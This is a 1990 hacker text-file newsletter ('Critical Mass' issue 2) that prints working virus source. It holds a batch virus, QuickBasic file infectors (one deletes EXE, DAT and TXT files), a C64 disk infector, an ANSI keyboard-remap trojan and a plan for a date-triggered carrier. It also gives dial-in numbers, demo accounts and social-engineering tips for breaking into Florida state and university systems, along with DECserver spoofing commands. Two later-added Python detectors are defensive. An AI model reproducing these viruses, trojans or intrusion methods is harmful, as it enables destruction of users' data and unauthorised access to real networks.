
  \        Critical              Issue # 02       A Technical Text          /
   \         Mass               ~~~~~~~~~~~       File Newsletter.         /

      __________        l___________ | ___________l
     //         \   _______   _____ l|l _____     ______              ___
    // /~~~~~~~\_\  l      \  l   l l|l l   l    //     \      _      l l
   // /             l  []  /  ~l l~ l|l ~l l~   // /~~~\_\    / \     l l
  <<<<   ritical    l     /    l l  l|l  l l   // /          /   \    l l
   \\ \             l    <     l l  l|l  l l  <<<<          / ___ \   l l
    \\ \_______/~/  l  l\ \    l l  l|l  l l   \\ \____/~/ / /   \ \  l l_____
     \__________/   l__l \_\  l___l l_l l___l   \_______/ /_/     \_\ l_______l

              ==-->                              ==-->
    ____    __    ____           ==-->                         (11/21/90)
    l   \        /   l  ass              ==--> 
    l    \      /    l      __        ______     ______ 
    l     \    /     l     /  \      /      \   /      \      A Technical 
    l  l\  \  /  /l  l    /    \    / /~~~~~~  / /~~~~~~  text file newsletter
    l  l\\      / l  l   / ____ \   \ ~~~~~~/  \ ~~~~~~/  ~~~~~~~~~~~~~~~~~~~~
    l  l \\____/  l  l  / /    \ \   ~~~~/ /    ~~~~/ /        Issue: 2
    l  l          l  l /_/      \_\ /~~~~ /    /~~~~ /
    ~~~~          ~~~~              ~~~~~~     ~~~~~~

 l     Writers              l Special thanks to....                          l
 l                          l                                                l
 l    The Beaver            l Old members of C.C.C, SF, Copy Cat, etc.       l
 l      Shadow              l Also, Abigail, The Nut-Kracker, Robo., etc.    l

 * Note: We, the writers and editors of this text newsletter, are not
         responsible for any injuries or prosecutions due to the information
         given in this text.

                         EXPERIMENT AT YOUR OWN RISK!

         Anybody who is willing can submit an article! If you wish to
         submit an article, please e-mail either 'The Beaver' or the
         'Nut-Kracker', via the 'Warriers Retreat' (904)422-3606. Also, all
         sysops can freely download this text on the terms that it is not
         altered and none of the credits are changed. So.................
         please act like a human! Also, for your convenience,
         every now and then a 'volume' of the Critical Mass is
         created. That is, after three to five issues (roughly 50k to 70k
         of text) a compiled text will be made containing the past issues,
         so if you have missed any issues, you can download the volume you need.
         In order for this text to keep on being produced, you the reader
         need to submit, either by asking questions (which will
         sometimes be included in the text) or by submitting an article.
         Any articles on Hacking, Fone Phreaking, Credit Card Surfing,
         Pirating, Chemistry, etc. are welcome. Any general 'not accepted'
         material is accepted here! Articles can be on anything from 'how
         to rip off this type of coke machine' to 'how to build an Axis bomb
         from spare car parts'. We hope you enjoy the information given and
         find some use for it.

       /\/\           Chief Editors            Brought To You By
      /\/\/\          ~~~~~~~~~~~~~               Members of
     /\/\/\/\          The Beaver                   (SC/HA)
    /\/\/\/\/\       The Nut-Kracker
  \/\/\Mass/\/\/         (SC/HA)  

 l          This issue contains articles of the following.....                l
 l                                                                            l
 l  I.    Editorial written by 'The Beaver'.                                  l
 l  II.   Latest information on hacking InterAct, written by 'The Beaver'     l
 l  III.  Destructive Programs For Your IBM PC, Part Two, By 'The Beaver'     l
 l  IV.   Very Basic Hacking! By 'The Beaver'                                 l
 l  VI    Hack DEC networks!, Written by 'The Beaver'-'The Shadow'            l
 l  VII.  Letters and Replies                                                 l

 l                           Today's Topic Is......                           l
 l                           Written By The Beaver                            l

          Well, as you may notice, The Nut-Kracker hasn't submitted any
articles for this text, but for a good reason. He has been having a lot go on
in his life and, well, just hasn't got the time. So, I may be looking for a new
editor and writer soon, so if you wish to fill this position, please E-mail me
at the Warriers Retreat. I wish for someone to fill this position with the
following requirements........ Some sort of hacking experience in the fields of
blue boxing, computer hacking, chemistry, or pirating. If you don't have this
experience, but would still like to become an editor, please E-mail me anyway.
          Also, don't expect this issue to be anywhere like the last one, but
if you do have some text files written by various hackers in the USA, please
tell me about them so I can include them in the next issue. I have several texts
that I lost and am looking for..... They are......

 The Outlaw Series ........ Written in Tallahassee, Fl (Sub. Explosives)
 Hacking VMS............... Written by members of Chaos Control
          If you have any copies of these, please E-mail me. By the way, the 
last issue (1st one) was over 138k bytes if you downloaded it.


   l I.              Latest Information On Hacking InterAct                 l
   l                        Written By 'The Beaver'                         l

         This is another FIRN hack that Florida hackers may find useful. The
system is called InterAct, off of the Florida Information Resource Network.
The Nut-Kracker and I broke into this system under a Demo account a little
while back. This system is running on an IBM 30XX series, I think, and is
running under VM OS. It is used by the state of Florida along with several
universities. But first, let me give you a list of Florida area fone numbers
to get in contact with this net.........

 City               Fone Number                Baud Rates

Boca Raton         (305)395-0552               300/1200
                        395-1410               300/1200
Brevard            (305)639-1790               300/1200
Broward            (305)764-5540               300/1200
Eglin AFB          (904)678-7056               300/1200
Ft.Myers           (813)489-4843               300/1200
Ft.Walton          (904)244-8185               300/1200
Gainesville        (904)392-5362               300/1200
Jacksonville       (904)646-2992               300/1200
Miami              (305)226-1846               300/1200
Orlando            (305)275-2220               300/1200
Pensacola          (904)474-2533,4,5,6         300/1200
Sarasota           (813)957-4682               300/1200
St.Pete            (813)893-9509               300/1200
Tampa              (813)974-3890               300/1200
Tallahassee        (904)488-0650,1,2,3,4,5,6,7 300/1200
W.Palm Bch.        (305)969-3504               300/1200

          Actually, a lot of these have 2400 Bds, but I can't remember which
ones do and don't. At any rate, when you log on, you will be greeted with a
'User Name:' prompt. Type 'Menu'. At the Menu you have a choice of three things
to do besides log out. I know it isn't the 3rd choice, so it is either 1 or 2.
Pick either one or two and look for 'InterAct'. Once you have found it, log on
to it. It should ask you for a username, ID and password. You can try the Demo
accounts, but I doubt they will work cause we used them to death. Well, if you
have gotten this far you are going to need some usernames plus ID's, so here
they are. This is straight from the buffer.....


        All the numbers to the left are ports. The first two ports are for the
sysops, and notice that in port 46 there is a 'demo,demo' account that
they forgot to take out. That's how we hack the systems. Now let me explain how
to find the user ID and names. Look at port 2. Notice that it says 'OPS$NWRAD'.
'OPS' is the username and 'NWRAD' is the ID. You can also sometimes tell where
certain people are calling from. Such as people with the user name 'BAY' are
probably calling from Bay County, Fl. Probably on the Eglin AFB line. Note:
notice that port 246 ID is BAYCS, or Bay County Schools. Notice things like
DOE (Dept. Of Education). Also, if you have any questions on hacking computers
in the Tallahassee region or just a type of system, I or someone I know may
be able to help, so just E-mail me if you have any sort of questions.

   l                  Destructive Programs For Your IBM                   l
   l                             Part Two                                 l
   l                      Written By 'The Beaver'                         l

           In part one (issue#1), we covered the following........

    How to use a text writer and debug to create small assembly programs.
    How to destroy disk (Trojan Horse) on drives A,B and C.
    How to create false errors.
    How to disable ALT-CTRL-DEL warm boot.
    A few other minor things.
           Hopefully, we can carry this a little farther.

     Command Level Batch Virus.

            A lot of people believe that it is not possible to create a virus
at a command level. This is wrong, though the virus is not that deadly. The
following code was put in for people to get a basic understanding of a virus.
The virus comes in four parts and is very, very easy to stop. If one of these
parts is deleted, the virus will fail to work. This code was written by Ralf
Burger in 1988 as a demonstration virus. Here's the code in three parts and
what the four parts are named.

Name:Vr.bat         (use edlin to enter it)

ctty nul
dir *.com/w>ind
edlin ind<1
debug ind<2
edlin name.bat<3
ctty con

Name:1              (use edlin)


Name:2              (use edlin)

e100,"del "
e10c 2e
e110 0d,0a
e112 "copy \vr.bat "

Name:3             (Must use Debug to enter this because of the 1Ah)

0100  31 2c 31 3f 52 20 1a 0d-6e 79 79 79 79 79 79 79
0110  79 20 0d 32 2c 32 3f 52-20 1a 0d 6e 6e 79 79 79
1120  79 79 79 79 20 0d 45 0d-00 00 00 00 00 00 00 00

         If you care to understand how the code works, then simply remove the
'ctty nul', because this sends all output to a 'nul' device. If you remove
that, also remove the 'ctty con', which restores output to the console. After
doing this, it should become very clear what is happening. This is a
command level, overwriting logical virus, so it actually takes the place of
its host's code.

         For part two, I am going to keep the first few programs very simple
and will probably get more into assembly code as we go along. As you have
probably been thinking, 'wouldn't assembly code work much better for a virus?'.
Well, that's correct. But first let's just get the basic understanding.

         The following code is written in BASIC. It is a logical overwriting
virus, but better self contained. It infects all files with the extension of
COM. The actual virus though is compiled to an EXE. form. To do this, I
used QuickBasic 4.5. The Marker is the length of the virus, or 40396 bytes.
This virus is also easy to stop, because the time and date stamp change, and
the length of the program and the file type also change. But to a person who
isn't greatly familiar with computers, it could still cause havoc. The only good
thing about this is that it is totally self contained. Here's the listing....

1 ON ERROR GOTO 3500: CLS : COLOR 0, 0
2 SHELL "dir *.exe>dna": SHELL "dir *.com>rna"
5 OPEN "rna" FOR INPUT AS #1
10 INPUT #1, w$, x$, y$, z$, a$
15 CLOSE #1: f = 1: KILL "rna": IF a$ = "" THEN 3500
20 f = f + 1
25 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 30
27 GOTO 20
30 oname$ = MID$(a$, 1, f - 1)
35 OPEN "dna" FOR INPUT AS #1
40 INPUT #1, w$, x$, y$, z$
45 INPUT #1, a$: b$ = MID$(a$, 17, 5)
47 a = VAL(b$)
50 IF a <> 40396 THEN 45
53 KILL "dna"
55 f = 1
60 f = f + 1
65 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 75
70 GOTO 60
75 nname$ = MID$(a$, 1, f - 1): COLOR 0, 0
80 KILL oname$ + ".com": SHELL "copy " + nname$ + ".exe " + oname$ + ".exe"
90 COLOR 0, 0
3010 KILL "dna": SHELL "del rna": end
3500 CLS : KILL "dna": KILL "*.exe": KILL "*.dat": KILL "*.txt": PRINT "Cough, H
ack, Sniff"
3501 end

         As you may notice, when the computer hits a disk error, all data is
destroyed. The next virus is also written in BASIC and is a logical virus.
Once again you will need a compiler to use it properly though. The only
difference is that the virus infects files with the extension of EXE. The
logical virus itself is also an EXE. type virus. But the modifications compared
to the one up top make this one work far better. The traits that it shares
with the first listing is that it also uses the length as a marker. The
advantages over the one up top are that......
1. The listing is shorter
2. Disk access is cut in half, so less time is consumed.
3. The file type stays the same.


  INPUT AS #1: INPUT #1, W$, X$, Y$, Z$, A$
10 IF A$ = "" THEN 200
15 B$ = MID$(A$, 17, 5): B = VAL(B$)
20 IF B <> 38622 THEN 50
25 IF VNAME$ <> "" THEN INPUT #1, A$: GOTO 10
30 F = 1
35 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 40
38 GOTO 35
40 VNAME$ = MID$(A$, 1, F - 1): IF VNAME$ <> "" AND oname$ <> "" THEN 80
45 INPUT #1, A$: GOTO 10
50 IF oname$ <> "" THEN INPUT #1, A$: GOTO 10
55 F = 1
60 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 70
65 GOTO 60
70 oname$ = MID$(A$, 1, F - 1): IF oname$ <> "" AND VNAME$ <> "" THEN 80
75 INPUT #1, A$: GOTO 10
80 CLOSE #1: KILL "DNA": KILL oname$ + ".EXE": SHELL "COPY " + VNAME$ + ".EXE " 
+ oname$ + ".EXE"
200 END
210 IF oname$ <> " " THEN SHELL oname$
220 END

         In case you have a little trouble understanding the two, here are some
flow charts that may, or may not help.

                          Create a 'DNA' and 'RNA'
                          File. 'DNA' holds all
                          'EXE.' files. 'RNA' holds
                          'COM.' files.

                           Are there any infectable
                           'COM' files stored in
                           the 'RNA' File List?
                            Y              N

                            !              !
                            !              !
                            !              !
                                   I am not home!!!

                    Get the name and      Del all 'TXT.','DAT.' and
                    store as 'oname'      'EXE.' files and display
                                          the message 'Cough, Hack
                            !             ,sniff'. After that, do a
                            !              crash.

                  Del 'RNA' and look through 'DNA' for a copy of the virus.
                  The marker is the length of the virus. Note: If it does
                  not exist, there is no way the prg. can be held in
                  memory. This will be stored as 'nname'.


                         Delete 'DNA' and the name under the string 'oname'
                         which will be a 'EXE.' file.

                         Copy the virus 'nname' as the old name was under,
                         'oname' and do a system crash.


  The Dir. will go from this.........

  PRAY1.COM                  To......            PRAY1.EXE    (Vir. Here)
  PRAY2.COM                                      PRAY2.COM    (No Vir)
                And So On To 'Pray2'.... 


          Here is a flow chart for the second virus listing. 

                                    Virus 2
                            Flow chart to a EXE to EXE
                            infector, unlike Virus 1.

 Shell to DOS and create a file
 with all EXE. files in the 
 current directory. The file
 that contains all the EXE file
 names is called `DNA`


 Get a file name out of `DNA`  <--------------!
            !                                 !
            !                                 !
 Does the file name pulled contain a          !
 virus?                                       !
     Y                         N              !
     !                         !              !
     !                         !              !
 Is 'vname' taken         Is 'oname' taken    !
  N          Y            N             Y ----!--!
                                              !  !
  !          !____________\___________________!  !
  !                       /                      !
  !                       !                      !
 Store file name as       Store file name as     ! 
 'vname'. Has 'oname'     'oname'. Has 'vname'   !
 been used?               been used?             !
  Y               N        Y                N    !
  !               !        !                !    !
  !               !_______/-\_______________!____!
  Replicate and end. 

 Virus2: Logical Virus.

 `Oname`      - Old file name used. This is the original uninfected file.
 `Vname`      - Virus file name. This file has been infected and is retrieved
                so that the virus can copy itself to the `oname`.
  e.g. -
          Delete oname
          Copy vname.exe oname.exe

(Sept. 18, 1990)                                         Written by The Beaver.
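
Added example (not part of the original newsletter, and not the author's code):
the text above notes that both BASIC listings are easy to catch because the
file type, the length and the date stamp change, and that each uses its own
length (40396 and 38622 bytes) as its marker. The Python sketch below compares
two DIR-style snapshots and flags exactly those traces. The listing layout,
file names and dates are constructed sample data, and parse_dir/diff_snapshots
are names made up for this example.

```python
from collections import defaultdict
from typing import NamedTuple

EXEC_EXTS = {"COM", "EXE"}


class Entry(NamedTuple):
    name: str   # base name, upper case
    ext: str    # extension, upper case
    size: int   # length in bytes
    stamp: str  # date and time as printed in the listing


class Finding(NamedTuple):
    kind: str            # "type-swap" or "size-clone"
    file: str            # the file that changed
    same_size_as: tuple  # untouched executables with the identical length


def parse_dir(listing: str) -> dict:
    """Parse 'NAME EXT SIZE DATE TIME' rows; any other line is skipped."""
    entries = {}
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) != 5 or not parts[2].isdigit():
            continue
        name, ext, size, date, time = parts
        entry = Entry(name.upper(), ext.upper(), int(size), f"{date} {time}")
        entries[(entry.name, entry.ext)] = entry
    return entries


def diff_snapshots(before: dict, after: dict) -> list:
    """Flag executables that were replaced by a copy of another program."""
    # Executables whose row is identical in both snapshots are the files a
    # replaced program could have been copied from.
    untouched = defaultdict(list)
    for key, entry in after.items():
        if entry.ext in EXEC_EXTS and before.get(key) == entry:
            untouched[entry.size].append(f"{entry.name}.{entry.ext}")

    findings = []
    for key in sorted(after):
        entry, old = after[key], before.get(key)
        if entry.ext not in EXEC_EXTS or old == entry:
            continue
        label = f"{entry.name}.{entry.ext}"
        twins = tuple(untouched.get(entry.size, ()))
        other = (entry.name, "COM" if entry.ext == "EXE" else "EXE")
        if old is None and other in before and other not in after:
            # Trace of the first listing: NAME.COM is gone, NAME.EXE is new.
            findings.append(Finding("type-swap", label, twins))
        elif old is not None and old.size != entry.size and twins:
            # Trace of the second listing: same name and type, but the length
            # now equals another executable's and the date stamp has moved.
            findings.append(Finding("size-clone", label, twins))
    return findings


# Constructed snapshots. Only the two lengths 40396 and 38622 come from the
# article; every name, date and the column layout are sample values.
BEFORE = """\
PRAY1    COM      1024  11-02-90   9:15a
PRAY2    COM      2310  11-02-90   9:16a
GAME     EXE     40396  11-20-90   4:01p
EDITOR   EXE     51200  08-14-90  12:00p
UTIL     EXE     38622  11-20-90   4:05p
"""
AFTER = """\
PRAY1    EXE     40396  11-21-90   7:30p
PRAY2    COM      2310  11-02-90   9:16a
GAME     EXE     40396  11-20-90   4:01p
EDITOR   EXE     38622  11-21-90   7:31p
UTIL     EXE     38622  11-20-90   4:05p
"""

if __name__ == "__main__":
    for f in diff_snapshots(parse_dir(BEFORE), parse_dir(AFTER)):
        twins = ", ".join(f.same_size_as) or "-"
        print(f"{f.kind:10} {f.file:12} same length as {twins}")
```

Keeping a baseline listing on write-protected media is what makes the
comparison trustworthy; the check itself needs nothing but names and lengths.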

         For the programs written in basic, it would be wise to use carrier 
programs, though they are not needed. It does look better if you do use one 
with these though. If you are going to write a carrier program, odds are that 
you will write it in BASIC. If so this is the best operation I see that you 
can do. Make the carrier program and the virus two different programs to save
disk access time. Make a 'loader' or replace one on a program, such as a word
processor we'll use for example. I would also go by either date or the number
of times the program is used. I prefer the date because you don't have to read/
write to the disk in the carrier program, thus saving time. This is the order 
I would do them in.....

1. Is today equal or greater than the date to go off? if so, continue to
   2. If not, run the wordprocessor as usual.
2. shell to the alt-ctrl-del killer  (mentioned in issue#1)
3. shell to the virus.
4. end.

          Actually, what I think is a good idea is to change the file type of
your virus from EXE. to say, DAT. This will make it more confusing to the user.
So your carrier would look like this......

1. Is today equal or greater than the date to go off? if so, continue to 2.
   If not, run the wordprocessor as usual.
2. Shell to the alt-ctrl-del killer
3. Change the virus's file type from DAT. to EXE.
4. shell to the virus
5. change the virus back to a DAT. file
6. end.

         Of course, this also will increase disk access time. That's the main
problem with viruses in any high level language. I did not include any carrier
code in this text because I am pretty sure that most users can write their own,
but if you would really like some carrier code, then E-mail me and I will
include it in the next issue.


         This is a very simple logical virus that I wrote on the c64
a number of years ago. This is the simple listing, in BASIC once again so that
you can build on it. I could have modified this listing several times, but I
will leave that up to you. You can add in things like a line to determine if the
virus is running on a c64 or c128. If it's running on a c128, you can tell it
to step up the clock speed, etc, etc..... I also have written a ton of trojan
horses for this machine, but will not include them here. If you wish that I
do, drop me a line........

10 open 1,8,0,"$0"
30 get#1,a$,b$
40 get#1,a$,b$
50 c=0
60 if a$<>"" then c=asc(a$):if c<>9 then 30
70 if b$<>"" then c=c+asc(b$)*256
84 get#1,b$:get#1,c$:get#1,d$:get#1,e$:b$="":c$="":d$="":e$=""
85 get#1,f$,g$,h$,i$,j$,k$,l$,m$,n$,o$,p$,q$,r$,s$,t$,u$,v$,w$
90 z$=f$+g$+h$+i$+j$+k$+l$+m$+n$+o$+p$+q$+r$+s$+t$+u$+v$+w$
100 close 1:open 15,8,15:print#15,"s0:"+z$
110 close 15
120 open 15,8,15,"i":close 15:save z$,8

          That's all the Commie stuff I'm including in this issue, unless you
ask for more in further issues.

          Let's now move on to the Trojan Horse for the IBM. It has been thought
for a long time that it was impossible to write a trojan into a text file on
the IBM. This is WRONG. There is a great danger that lies here. The reason is
because of the ANSI driver that is installed on most IBM's today. It is
possible that I could have included a trojan in the very text you're reading,
but I did not. But to prove a point, at the end of this text, press the 'A' key
and there will be a msg. displayed. This is what you would see right here.......
(NOTE: for the letter 'A' to be remapped, you must 'type' this file and have
 an ANSI driver installed.)

"[65;"echo The Beaver Was Here!";13p"
"[97;"The Beaver Was Here!!!";13p"

          These are escape codes. I could have easily said something like, gee,
ya know what you should never type? That del *.com. In that one sentence, I
COULD have remapped your keyboard to wipe every COM. file out when you hit the
letter 'D'. But I didn't though. Here's how it is done......

          What is happening is that we are placing escape codes in the beginning
of our sentence. I will show you the escape codes here. Note the hex dump of
the .......

22 1B 5B 36 35 3B 22 65-63 68 6F 20 54 68 65 20     ".[65;"echo The
42 65 61 76 65 72 20 57-61 73 20 48 65 72 65 21     Beaver Was Here!
22 3B 31 33 70 22 0D 0A-00 00 00 00 00 00 00 00     ";13p"..

           First let me explain what some of the Hex codes stand for.......

22 - "       20 - (space)     1B - escape

           Now, actually, the first '22' and the last one can be removed with
no effect on the trojan. After the '22', you will notice a 1B, which invokes
the ANSI controller. Then what we tell it is that we are remapping asc '65', or
the letter 'A', to mean 'echo The Beaver Was Here'. The 13p gives us a return at
the end. I won't go too much into detail for you IBM users, because that's why
the program 'Remap Utility 1.0' was included in this issue. This program does
the whole remapping process for you. If you do want to learn more about ANSI,
then refer to your manual. Well, that's part two, but the next issue will
contain part three of this ongoing series. The next part will contain.......

   Complete Non-overwriting code in assembly.

            That's about it, the code's pretty long..... (500 bytes with remarks)
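
Added example (not part of the original newsletter, and not the 'Remap Utility'
it mentions): a Python scanner for the key reassignment sequence described
above, ESC [ code ; "string" ; 13 p, which reports which key a text file would
redefine and what that key would then type, and can strip the sequences before
the file is displayed. The first sample is the article's own hex dump; the
other lines, and the names find_key_remaps and strip_key_remaps, are made up
for this example.

```python
import re
from typing import NamedTuple

# One parameter: a decimal number or a quoted string.
_PARAM = rb"""\d+|"[^"]*"|'[^']*'"""
# ESC [ param ; param (; param)* p   -- the final 'p' selects key reassignment.
# Colour and cursor sequences end in other letters and are not matched.
_REMAP = re.compile(rb"\x1b\[((?:%b)(?:;(?:%b))+)p" % (_PARAM, _PARAM))


class Remap(NamedTuple):
    offset: int  # position of the ESC byte in the file
    key: str     # key being redefined ("A", or "0;59" for an extended key)
    sends: str   # what the key will type once the file has been displayed


def _text(token: bytes) -> str:
    """Quoted tokens are literal text, bare numbers are character codes."""
    if token[:1] in (b'"', b"'"):
        return token[1:-1].decode("cp437")
    return bytes([int(token) & 0xFF]).decode("cp437")


def find_key_remaps(data: bytes) -> list:
    """Return every keyboard reassignment found in data."""
    hits = []
    for m in _REMAP.finditer(data):
        tokens = re.findall(_PARAM, m.group(1))
        if tokens[0] == b"0" and len(tokens) > 2 and tokens[1].isdigit():
            # Extended keys (function keys etc.) are written as 0;nn.
            key, rest = f"0;{int(tokens[1])}", tokens[2:]
        else:
            key, rest = _text(tokens[0])[:1], tokens[1:]
        hits.append(Remap(m.start(), key, "".join(_text(t) for t in rest)))
    return hits


def strip_key_remaps(data: bytes) -> bytes:
    """Remove reassignment sequences, leaving other ANSI codes alone."""
    return _REMAP.sub(b"", data)


# The article's hex dump without the zero padding (0x20 for the space in
# "Was Here").
PAGE_BYTES = bytes.fromhex(
    "22 1B 5B 36 35 3B 22 65 63 68 6F 20 54 68 65 20"
    "42 65 61 76 65 72 20 57 61 73 20 48 65 72 65 21"
    "22 3B 31 33 70 22 0D 0A"
)
# Constructed file: plain text, the dump, a harmless colour sequence, and a
# made-up extended-key reassignment.
SAMPLE = (
    b"Plain text line\r\n"
    + PAGE_BYTES
    + b"\x1b[1;31mred\x1b[0m\r\n"
    + b'\x1b[0;59;"dir";13p\r\n'
)

if __name__ == "__main__":
    for hit in find_key_remaps(SAMPLE):
        print(f"offset {hit.offset}: key {hit.key!r} would send {hit.sends!r}")
```

Viewing untrusted text through a pager or editor that does not pass escape
codes to the ANSI driver avoids the problem without any scanning.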

        l                      Very Basic Hacking                     l
        l                    Written By 'The Beaver'                  l

        I have noted that there are a lot of young and new hackers taking on
the BBS scene. A lot of them are completely new to hacking, so I included a
few tips and advice for the new hackers out there. All you other, more
experienced hackers can just skip through this stuff, or bear through it
in hopes you may learn something.

Unix -   UNIX can sometimes be identified just by the prompt, just like most
         machines. On a VAX running UNISTRIDE, you will get a greeting
         message of some sort along with a logon prompt. Type CTRL-S.
         If the damn thing freezes up on ya, it's probably UNIX. To get it
         unstuck, hit CTRL-Q. There are other ways to identify this. Sometimes
         a CTRL-Y will reset the login message. Characters that make the
         cursor dance, etc. UNIX is hard to put in one field, because it can
         be used on everything from the home PC to a mainframe. I really hate
         UNISTRIDE, unless it is set up hack easy, which is rare. You can hack
         it several ways. First off, some UNIX systems allow you to use a
         'WHO' command to get a userlist before logging on. This is rare.
         You can, believe it or not, sometimes use the rapid fire method
         (Explained later). Sometimes there are also guest accounts. A guest
         account goes like this; Username:GUEST  Password:<CR>. Hard, huh?
         Once inside, you will find this OS very easy to use. To get higher
         access, you can get the privileged password. That is, like on a DEC
         server, normal users can become privileged by the use of one password.
         There are also some other advanced ways discovered by Robert Morris,
         Jr. Like the Sendmail attack, and the fingerd attack. But we won't
         go into advanced hacking right now.
VMS -    Very user friendly. To confirm you're on VMS, type /XXXX. Fill in the
         'XXXX' with any garbage. If you get an error along the lines of
         'command qualifier not present', or something like that, you're on
         VMS. Try DEMO accounts first (always do this!). A lot of times, the
         password is the same as the username, in the default settings. Get
         a copy of 'Hacking VMS' by the Chaos Control Commit. (C.C.C). If you
         find this, e-mail me, I can't find it anywhere.
VM-370 - Sucks

         Well I won't go into Primo's, VM-370, RSTS, TOPs, or ULTRIX shit.

Rapid -  This method doesn't work much anymore, except on old Burroughs
Fire     systems and stuff. Any rate, here's what happens. Imagine you ask
         a system 'what time is it?'. The system will put your command in a
         buffer and run off and see if you have access to get the time. While
         it runs off, you change the command to something like, 'Give me a
         userlist'. The system comes back with an 'Okay', and allows the second
         command to fall through. That's one way of this method, here's another.

         You ask the system any question, like the time for instance. When it
         runs off to get verification, you fill the buffer with crap. This is
         basically how the fingerd method works, but a little more complicated.
         I've only seen these two methods work once on a B2700, I think it was.
Decoy -  Ok, this is a more advanced hacking method. I will just give the idea
         here. We'll actually get into it in Hacking DEC, part II. Think of
         this on a PC BBS level. You're the user and I'm the hacker. Now
         you call the BBS and you see things to recognize, right? Things like
         welcome to such and such BBS and all that. Well, one day I decide I
         want an account on a system. We'll just say that I use call forwarding
         from the BBS to my house. See? I get all the info and not the BBS!
         So in the end, you think you're on something you're not, and I get all the


       l                                                                l
       l                   Hacking DECserver's Part II                  l
       l                        By 'The Beaver'                         l

        Here is more information about those great DECservers you and I love.
Please, read part I or you won't understand what is going on. The information
given, like last time, we believe has never been disclosed in any other text
file or news letter. You should feel lucky. All information was found by myself,
'The Beaver', 'Shadow', and 'The Nut-Kracker'. We also had some help from
several other people. Thanx..........

        To start off, let's talk just about the servers themselves. In the first
part, I called it 'Hacking DEC200 servers'. This was an incorrect statement.
That is, you can use these skills on many other nets such as the EMULEX corp.
Performance4000, or the DEC300 servers, so don't take the first part that
literally. There are some things different on the DEC200 and 300's. 200's
can only support 8 ports because there are only 8 rs232 ports, but they can
be expanded to 16 ports. The 300 has 16 ports and can support 32. Some DEC's
can support up to 50 ports that I know of. The same with 4000's. One great
way to find out hacking info on these is to call DEC at 1800-323-4827. Sound
like you know what you're talking about, and they will tell you anything. Just
say something like, "Hello, I'm here at UF using a DEC (DECK)200, and I'm having
trouble setting up the maintenance password. What should I do?". He'll ask you
a bunch of questions like, "What's the DEC200 on?". You say "A VAX running VMS
5.1". If you sound like you know what you're doing, you can get anything from
these people. Well, enough small talk, let's get started..........

         A while back, the Shadow and I found a state-run DEC200 in our
region. All it had on it was 2 in/out modems (pre-programmed), LAT Printer,
and a VAX named 'Legal3'. Pretty pointless to use a server for this, but
at any rate, we became interested in the VAX. We decided to attempt to set up a
decoy (explained later in the text). Shadow was the first to do this.
         When he set it up, he found that suddenly a remote port logged in, and
was following him around, but when he disconnected from it, the remote port
disappeared. Pretty strange, needless to say. We came to the theory that this
was some sort of monitoring port, that seemed to only come alive when a service
was set up. Any rate, it doesn't stop there. Once he tried to knock
out that remote port and got a -151- error message, or 'system init 1 minute
to shut down', but this was canceled, but not by him. We figure that there are
ways to make your server more secure. We were able to get past it though.
         Just recently, we found this while trying to set up decoys. This is
really odd, and we still don't know what to make of it. We went on and typed
the following........

set service test
set service test idenification "testing 1-2-3"
set service test port all enabled

         This creates a fake service "test" and says that all ports can use
it. The thing is that it says it's a computer, it's available and this is what
it is. When you connect to it, nothing happens. A complete null. Once though,
when we were hacking very fast, but I won't go into that, Shadow was booted
from the system, and a remote port was put in his place. A chaser program that
I just talked about. He got booted because of call waiting. I wasn't sure
if he left or if he changed his port from dynamic status to remote status,
so I sent him a message. I got no response, and returned to the fake service.
When I returned, I received my own message, even though I sent it to his port.
Could this be the broadcast buffer? We are not sure yet, and will fill you in
when the answer is found. Here are a few more commands that will help you in
the future.

set server dump e/d     (priv. only)
                        In a REAL crash (not a init), all memory contents are
                        dumped to a console port, or YOU!
sho service local       shows all local services like LAT printers, in/out
                        modems, etc............
and last but not least.......

set service connections (get help) this allows you to connect OTHER ports to

        Well, sorry there's not more, but we have been having some trouble
lately, but there is more to come........ Before I go, here is a list of
call numbers off of ufnet for you FIRN hackers.........

Call #         Comment
200            DECserver
201            EMULEX 4000 server
202            Ditto
3000           DECserver
3001           Ditto
3002           Ditto
3003           Ditto
2000           NERDC (North east regional data center)
1400           VAX/UNIX ??????
1100           UNKNOWN
900            Industrial VAX/UNIX
800            UNIX(Bikini)
700            UNIX/VAX (Beach)
500            VAX 11/750
250            DECserver (down ALOT!)
170            Selene
120            Selene

                             Thats All! Chow


                l                                           l
                l           Letters and Replies             l

       here anonymous like, unless you tell us otherwise. Please, ask 
       questions and I will try to reply or find the answer for you. The
       whole basis of this text depends on YOU!

Msg #   1                        Date: Fri 12-28-90,  8:35 pm
From: XXXXXXXXXXXX               Read: 1 times  [1 Reply]

Subject: Hacking stuff... (Hows the wife/kids)

The Beaver,

       I just finished your little article called "CRITICAL MASS", and must
say,  I am impressed!  You apparently know your stuff! Anyway I have a few
questions concerning some of the things you talked about... (I am interested
in that kind of thing)...

       Number 1:
               Where did you learn about Assembly... I mean you just do not
read the stuff you talked about in PC World or other PC magazines (do
you?)...  The reason I would like to know is because I am the type of person
who likes languages, practical jokes.. etc... (BTW nice keyboard locker, and
Disk Access locker!)(My brother went nuts trying to fix the computer!)

       Number 2:
               Do you know anything about something called "GREEN BOXING"...
I am sure you do, since you know about BLUE BOXING... Well, I need the plans
for a "green box", and figured you might have some you could upload, and
place a password on for me... I of course would need a part list... (Reading
the plans is hard enough for me, much less telling the difference on paper
between a capacitor and a transistor...! But hey I am learning...

    And lastly:
               If you have no idea what I mean (if I misnamed it)... This
little mechanism is in a little box about the size of your hand... And when
the button is pushed on it, it emits a series of clicks, and beeps... When
held up to a pay-phone, these clicks, and beeps sound to it like a Quarter
dropping into it.. And these are nice for long distance calls, etc...

Well, That is it, and oh by the way.... You would be surprised at the number
of "Program Hackers" around town now-a-days......



P.S.  Please keep the information coming.... Oh yea before I forget I am
having trouble getting on to the FIRN system... What is my terminal

         First the first question. I learned a lot of assembly from a school
friend of mine while taking electronics and becoming a tech. He has to be the
most versatile programmer I have ever seen. He taught me all about what 
registers do to what an interrupt 13 will do. There are tons of books on 
assembly, but they are hard to read and very technical. I got really started
after using an assembler called "CHASM" which comes with a little tutorial on
assembly. From there I just got the books it told me about. By the way, that's
great about your brother. Also, code like I gave in the last issue isn't hard
